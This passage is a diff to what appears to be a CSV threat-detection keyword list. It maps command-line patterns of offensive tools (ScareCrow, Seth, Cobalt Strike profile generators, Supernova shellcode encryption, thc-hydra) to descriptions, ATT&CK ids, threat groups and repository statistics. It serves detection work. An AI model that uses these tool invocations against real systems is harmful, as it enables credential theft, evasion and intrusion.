TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*./rsocx -*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - 
TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
-"*./scan4all *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
-"*./ScareCrow *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
-"*./ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
-"*./ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
-"*./seth.sh * *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
-"*./snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z"
+"*./scan4all *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*./ScareCrow *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*./ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*./ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*./seth.sh * *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
+"*./snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z"
 "*./SourcePoint *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z"
-"*./sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z"
-"*./t14m4t *","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*./sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z"
+"*./t14m4t *","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
 "*./teamserver *","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z"
 "*./teamserver *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*./update-beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*./update-beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
 "*./Vegile*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z"
-"*./xhydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*./xhydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
 "*./xrkRce *","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","0","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z"
 "*./zabbix.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z"
 "*./zexp check -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z"
@@ -2222,18 +2222,18 @@
 "*.api.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
 "*.apps.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
 "*.asreproast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z"
-"*.athena_utils *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z"
+"*.athena_utils *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
 "*.beta.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
-"*.bin -enc rc4 -lang c -k 3 -o *.bin*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
-"*.bin -enc rc4 -lang csharp -k 9*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
-"*.bin -enc rot -lang csharp -k 2 -d*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
-"*.bin -enc rot -lang rust -k 7*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
-"*.bin -enc xor -lang csharp -k 2 -v nickvourd*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
-"*.bin -enc xor -lang nim -k 4*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
+"*.bin -enc rc4 -lang c -k 3 -o *.bin*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc rc4 -lang csharp -k 9*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc rot -lang csharp -k 2 -d*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc rot -lang rust -k 7*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc xor -lang csharp -k 2 -v nickvourd*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc xor -lang nim -k 4*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
 "*.blog.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
 "*.BruteRatel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
 "*.cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
-"*.cobaltstrike.beacon_keys*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*.cobaltstrike.beacon_keys*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 